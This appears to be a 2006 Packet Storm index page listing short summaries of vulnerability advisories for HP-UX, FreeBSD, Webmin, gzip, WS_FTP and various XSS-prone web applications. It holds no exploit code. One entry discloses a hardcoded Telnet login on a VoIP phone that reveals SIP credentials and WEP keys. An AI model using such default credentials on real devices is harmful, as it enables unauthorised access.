HPSBUX02152 SSRT5973 rev.1 - HP-UX Kerberos Client Remote Unauthenticated Execution of Arbitrary Code
f4b2126a3aa24d1d1d3e1aed624c576aHPSBUX02155 SSRT061235 rev.1 HP-UX CIFS Server (Samba) Local Unauthorized Access, Elevated Privileges
aba1a7a1445785ee13adb1de9d17224cwwwthreads 5.4.2 and prior suffer from multiple cross site scripting vulnerabilities.
7aed22b7819d49ae37e0beb0d1f9331ePhotoStore suffers from multiple cross site scripting vulnerabilities.
9084b2681380764b26cc434db91fa37eOpial Audio/Video Download Management suffers from cross site scripting in index.php
4102a3a0ee3136f47315374f6b7ba61etoendaCMS suffers from a local file inclusion vulnerability.
71fb4a31475c2f9320336ac582e8548fRISE-2006002: There exists a vulnerability within a architecture dependent function of the FreeBSD kernel (FreeBSD 5.2-RELEASE through FreeBSD 5.5-RELEASE), which when properly exploited can lead to local compromise of the vulnerable system. This vulnerability was fixed in FreeBSD 6.0-RELEASE, but production (legacy) releases 5.2 through 5.5 are still vulnerable.
f2780f72b89096adff1c6779d3cc1a1fMandriva Linux Security Advisory MDKSA-2006:169: A number of security vulnerabilities have been discovered and corrected in the latest Mozilla Thunderbird program, version 1.5.0.7.
14810ae4b53934fd3c275f5000861790Mandriva Linux Security Advisory MDKSA-2006-170: Webmin before 1.296 and Usermin before 1.226 does not properly handle a URL with a null ("%00") character, which allows remote attackers to conduct cross-site scripting (XSS), read CGI program source code, list directories, and possibly execute programs.
04b553f5d6581240b9004ff9cdb976a0SUSE Security Announcement SUSE-SA:2006:055: If an RSA key with exponent 3 is used it may be possible to forge a PKCS verify the certificate if they are not checking for excess data in the RSA exponentiation result of the signature.
0a1792226cc68525898acf2df0016294jevoncms (.inc) suffers from a path disclosure vulnerability.
bb8866aa171e0f86762140220e6b31e7Plesk 7.5 and prior and 7.6 for windows suffer from an information disclosure vulnerability in the file manager.
1046960464b77bb56826f884e0e0d616MySource Matrix versions 3.8 and below and MySource 2.x may be used as an unauthorized HTTP proxy.
8272cae4c9dc5ce26e290541e1a3926dContentKeeper 123.25 and below suffers from a design flaw in the user administration interface which reveals account passwords inside the HTML source code. Any authenticated user with appropriate access to the user administration page may use this information to compromise the accounts on other systems.
8d21025d439de1c8b81c2f2abe5480a9Zachary McGrew has discovered and reported that the FiWin SS28S WiFi VoIP SIP/Skype Phone with firmware version 01_02_07 has VxWorks Telnet open with a hardcoded user/pass of 1/1. Various debug commands enable viewing SIP credentials, WEP keys, etc. on the phone.
9e64e6051a1993ab8b3ae5b7969f1364Woltlab Burning Board 2.3.X SQL Injection Vulnerability
0ff0518c371aaab5c13ca0ea8485d36eAPPLE-SA-2006-09-21 AirPort Update 2006-001 and Security Update 2006-005: The security fixes described below are available in AirPort Update 2006-001 and Security Update 2006-005. AirPort Update 2006-001 contains an additional non-security fix to address a reliability issue that occurs on a limited number of MacBook Pro systems.
67d50ca1637b01d9ea6d85d2f9486f2dCAID 34616, 34617, 34618: CA eTrust Security Command Center and eTrust Audit vulnerabilities
31c8181be157b2538ea7ecf9e3c526d5During the analysis of RSA Keon Certificate Authority Manager, Arhont Ltd consultants have discovered several vulnerabilities in the Log Verification function. A rogue CA (Certificate Authority) administrator or any local administrative user with the access to the CA server could manipulate the secure logging process to disguise his/her activities. Versions 6.6 and 6.5.1 are vulnerable.
80d3dba089214b06a42a1765eeb39e12scip AG Vulnerability ID 2555 (09/21/2006) Sun Secure Global Desktop prior 4.3 multiple remote vulnerabilities
7098aa6085d0290daa91bcffb066fc80Commerce Bank's website is susceptible to cross site scripting.
85fb4030c30d2aa005d11d56f87100beSeveral greek banks suffer from cross site scripting vulnerabilities.
304e9d8091083adf73b2103cd91f19feSUSE-SA:2006:056 - The gzip tool does not handle some specific values correctly when unpacking archives. This leads to vulnerabilities like buffer overflows or infinite loops.
c3080e7b37844e76782d8539c5a7a834ZDI-06-029: Ipswitch WS_FTP Server Checksum Command Parsing Buffer Overflow Vulnerabilities
a18aecd4e964c420fbf86eaf5a01542erPath Security Advisory: 2006-0170-1 - Previous versions of the gzip package contain multiple vulnerabilities that enable user-complicit unauthorized access when a user attempts to gunzip intentionally malformed gzip files. Some network services will automatically run the gunzip program in some contexts, which may then enable direct unauthorized access to the user account that provides the network service.
bc9030050a66cde7562425954c30e607
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed